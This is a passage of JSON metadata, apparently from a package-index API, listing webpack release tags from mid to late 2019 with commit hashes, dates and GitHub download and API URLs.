ck/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack